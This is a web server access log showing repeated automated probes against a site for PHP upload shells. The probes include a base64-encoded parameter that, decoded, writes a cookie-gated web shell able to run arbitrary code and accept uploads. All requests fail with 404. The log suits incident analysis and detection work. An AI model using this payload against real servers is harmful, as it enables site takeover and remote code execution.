192.121.16.196 - - [01/Dec/2025:14:01:42 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
192.121.16.196 - - [01/Dec/2025:14:01:48 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.112.223.135 - - [01/Dec/2025:14:20:33 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
216.73.216.189 - - [01/Dec/2025:14:29:49 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:14:38:35 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2719.38 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:14:38:41 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2719.38 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:07:51 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:15:17:23 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:15:17:23 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:14:48:35 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)"
198.186.131.59 - - [01/Dec/2025:14:57:13 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.12 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:14:57:14 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.12 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:14:57:14 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.12 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:07:47 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:07:51 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:15:17:17 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:15:17:18 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
64.227.115.90 - - [01/Dec/2025:15:20:38 +0000] "GET /favicon.ico HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:25:52 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:25:52 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:26:10 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:14:57:15 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.12 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:14:57:19 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2933.12 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:07:59 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:08:07 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:08:09 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2668.64 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:36:01 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:15:17:23 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:15:17:24 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2980.17 Safari/537.36"
64.227.115.90 - - [01/Dec/2025:15:20:38 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:25:51 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:25:51 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2817.28 Safari/537.36"
198.186.131.59 - - [01/Dec/2025:15:35:32 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:15:36:00 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:15:36:01 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:15:36:01 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [01/Dec/2025:15:44:45 +0000] "GET / HTTP/1.1" 200 1493 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:15:44:45 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:15:44:46 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:15:44:46 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:15:44:46 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:15:44:46 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko"
194.68.32.135 - - [01/Dec/2025:15:54:06 +0000] "GET / HTTP/1.1" 200 1493 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:15:54:25 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:15:36:02 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
